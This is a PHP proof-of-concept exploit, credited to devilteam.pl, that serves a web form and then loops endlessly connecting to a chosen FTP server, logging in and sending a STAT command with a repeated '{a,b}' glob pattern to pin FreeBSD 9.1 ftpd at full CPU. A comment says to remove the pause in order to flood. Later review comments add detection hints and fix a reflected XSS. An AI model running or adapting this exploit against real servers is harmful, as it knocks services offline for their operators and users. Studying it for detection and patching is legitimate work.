<?php
//PoC by Kacper R. from devilteam.pl
//Bug found by: Maksymilian ( cxsec.org )
// Remove PHP's execution time limit so the request below can run indefinitely.
set_time_limit(0);
// The connection loop runs only when the "runit" query parameter is present
// (the second-stage submit button of the form below carries that name).
// NOTE(review): host, port, user and pass are read from $_GET without validation,
// and the defaults for them are assigned only after this block. Any client that
// can reach this script can therefore make the web server open TCP connections
// to an arbitrary host:port.
if(isset($_GET['runit'])){
flush();
// No exit condition in the code: the loop continues for as long as the PHP
// request itself keeps running.
while(1){
// 5-second connect timeout. The return value is not checked, so a failed
// connect passes false to the fread/fwrite/fclose calls that follow.
$fp = fsockopen($_GET['host'], $_GET['port'], $errno, $errstr, 5);
// Read up to 1024 bytes and discard them (presumably the server greeting).
fread($fp,1024);
// Log in with the supplied credentials; each reply is read and discarded.
fwrite($fp, "USER ".$_GET['user']."\r\n"); fread($fp,1024);
fwrite($fp, "PASS ".$_GET['pass']."\r\n"); fread($fp,1024);
// STAT argument: the five characters "{a,b}" (chr 123,97,44,98,125) repeated
// 64 times. Per the page title and button label this is the request that leaves
// a FreeBSD 9.1 ftpd process at 100% CPU.
// Detection: FTP command logs or network inspection can flag a STAT (or other
// path-taking command) whose argument is a long run of consecutive brace groups,
// especially when the same login repeats it within a fraction of a second.
// The page does not name a fixed version; check the vendor advisory.
fwrite($fp, "STAT ".str_repeat(chr(123).chr(97).chr(44).chr(98).chr(125),64)."\r\n");
// The socket is closed without reading the STAT reply.
fclose($fp);
// 0 s + 300,000,000 ns = 0.3 s pause between connections.
time_nanosleep(0,300000000);//delete to flood
flush();
}
}
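/**
 * Escape a value for output inside a double-quoted HTML attribute.
 *
 * The form below reflects query-string values back into the page; without
 * escaping, a value containing a double quote followed by markup breaks out of
 * the value="..." attribute (reflected XSS).
 *
 * @param mixed $value Value to print; cast to string before escaping.
 * @return string The value with &, <, >, " and ' converted to HTML entities.
 */
function poc_attr($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Form defaults. A missing parameter, or a non-string one (e.g. host[]=x, which
// PHP parses into an array), is replaced by the default so that only plain
// strings are ever written into the markup.
foreach (array('host' => 'localhost', 'port' => '21', 'user' => 'anonymous', 'pass' => 'anonymous') as $field => $default) {
    if (!isset($_GET[$field]) || !is_string($_GET[$field])) {
        $_GET[$field] = $default;
    }
}

// NOTE(review): the form uses method="GET" and a plain text field for the
// password, so the FTP credentials end up in the URL (browser history, proxy and
// web-server access logs).
echo '<html><head><title>FreeBSD 9.1 ftpd Remote Denial of Service</title></head><body>
<h1>FreeBSD 9.1 ftpd Remote Denial of Service</h1><P><form action="" method="GET">
<PRE>
Host: <input type="text" name="host" value="'.poc_attr($_GET['host']).'">
Port: <input type="text" name="port" value="'.poc_attr($_GET['port']).'">
User: <input type="text" name="user" value="'.poc_attr($_GET['user']).'">
Pass: <input type="text" name="pass" value="'.poc_attr($_GET['pass']).'">
</PRE>
</p>';

// Two-stage submit: the first button is named "confirm"; once "confirm" is in
// the query string the page shows a second button named "runit" instead.
if (isset($_GET['confirm'])) {
    echo '<input type="submit" value="!!!!!!Confirm !!!!!! And click this again when stop" name="runit">';
    echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt2.gif"></a><a href="http://cxsecurity.com/"><img src="http://cxsec.com/images/wlb/cxsecbannersmal.png" width="100" hight="40"></a>';
} else {
    echo '<input type="submit" value="Create ftpd process 100% CPU" name="confirm">';
    echo '<p><br /><a href="https://devilteam.pl/"><img src="https://devilteam.pl/images/dt.gif"></a><a href="http://cxsecurity.com/" ><img src="http://cxsec.com/images/wlb/cxsecbanersmal.png" width="100" hight="40"></a>';
}
echo '
</form>
</body>
</html>';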
?>